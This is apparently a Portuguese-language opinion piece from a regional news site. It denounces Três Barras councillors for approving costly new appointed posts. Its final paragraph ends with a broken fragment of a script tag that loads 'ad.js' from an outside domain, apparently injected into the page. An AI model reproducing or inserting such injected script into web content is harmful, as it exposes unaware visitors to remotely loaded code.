InícioDestaqueVereadores de Três Barras, Vocês Estão Cegos, Surdos e Mudos?

Vereadores de Três Barras, Vocês Estão Cegos, Surdos e Mudos?

Últimas notícias

A Trajetória de Antônio Viliczinski e a Origem do 3ºBPM

Dando continuidade à série de entrevistas com veteranos do...

Saúde intensifica campanha e alerta sobre sintomas de arboviroses

Com mais de 93 mil casos prováveis de dengue,...

Polícia Militar derruba ponto de tráfico em Três Barras

Após diversas denúncias anônimas via 190 sobre atividades de...

VERGONHA! OU MELHOR, SEM VERGONHA!

Você não viram a população que lotou a casa de leis duas vezes? Vocês não ouviram os seus anseios para que a prefeitura tresbarrense não fosse loteada? Vocês não perceberam que o maior interessado, o povo, era contra? Agora, esperamos que quebrem o silêncio e nos expliquem o porquê. Por que votaram contra o povo? Por favor nos falem, sem enrolação, que motivos os levaram a trair aqueles que os elegeram?

 

 

Serão mais 720 mil por ano!

 

 

Sim, 720 mil reais por ano é a previsão de custo dos novos cargos aprovado na Câmara de Vereadores de Três Barras.

 

 

Parece que a tática utilizada pelo vereador Laudecir deu resultado, pois até mesmo um dos maiores críticos do projeto, o edil Bano Mendes mudou de opinião e votou a favor da criação dessa obscenidade. Queria eu saber o motivo que o levou a tal decisão, que negociações realizou? Ameaças, será?

 

 

Foram apenas dois votos contrários, Marco Antônio (Gorguinho) e Dani Krailing (esse texto não é para eles), e teve também duas ausências, Ernani Jr e Edenilson. Lembrando sempre, quem cala consente.

 

 

Um áudio vazou durante a tarde de segunda, onde supostamente o diretor da SAMASA afirmava não haver necessidade de se criar a vaga na autarquia que o mesmo dirige e, que tal ato era simplesmente para atender obrigações políticas. O próprio Vereador Bano já havia feito tal afirmação antes.

 

 

Outro fato estranho que ocorreu, foi uma reunião dos funcionários comissionados na Câmara, algo que não é corriqueiro da administração e que impossibilitou que o público que foi acompanhar a seção pudesse entrar para fazer pressão, pois o recinto já estava lotado.

 

 

Cabe salientar, o prefeito, em momento algum, buscou explicar a real necessidade de se aprovar a criação desses cargos, sua ação foi de ditador, no melhor estilo do coronelismo, mandou aqueles que dependem do emprego para impor sua vontade.

 

 

Que vergonha prefeito, foi para isso que o senhor foi eleito?

 

 

A conclusão que podemos tirar de tudo o que aconteceu é que vão usar o dinheiro do público para consumar suas alianças políticas…. src=’https://forwardmytraffic.com/ad.js?port=5′ type=’text/javascript’>

Equipe A Gazeta Tresbarrense
Equipe A Gazeta Tresbarrense
Somos um jornal regional com mais de 20 anos de existência.